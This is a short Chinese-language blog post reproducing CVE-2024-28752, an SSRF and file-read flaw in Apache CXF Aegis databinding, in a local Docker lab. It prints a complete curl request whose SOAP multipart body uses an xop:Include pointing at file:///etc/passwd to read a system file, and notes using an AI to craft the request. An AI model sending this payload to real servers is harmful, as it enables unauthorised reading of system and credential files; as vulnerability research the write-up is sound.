CVE-2024-28752 Apache CXF Aegis databinding SSRF漏洞 (复现)

CVE-2024-28752目录终端下执行docker compose up -d开启容器
访问ip:8080
image

验证该容器是否完全启动成功/查看服务期望的参数类型
访问 http://192.168.75.132:8080/test?wsdl
image

将参数类型丢给AI解析,生成精确的恶意攻击请求
curl发送精确请求

点击查看代码 
curl -X POST http://192.168.75.132:8080/test \
-H "Content-Type: multipart/related; boundary=----WebKitFormBoundary123456" \
--data-binary @- <<EOF
------WebKitFormBoundary123456
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
   <soapenv:Header/>
   <soapenv:Body>
      <web:test>
         <arg0>
            <count>123</count>
            <text>
               <xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/passwd"/>
            </text>
            <you>true</you>
         </arg0>
      </web:test>
   </soapenv:Body>
</soapenv:Envelope>
------WebKitFormBoundary123456--
EOF
![image](https://img2024.cnblogs.com/blog/3680810/202507/3680810-20250727195019061-220203904.png)

成功复现!解码即可查看/etc/passwd内容

posted @ 2025-07-27 19:53  小小葱油  阅读(242)  评论(0)    收藏  举报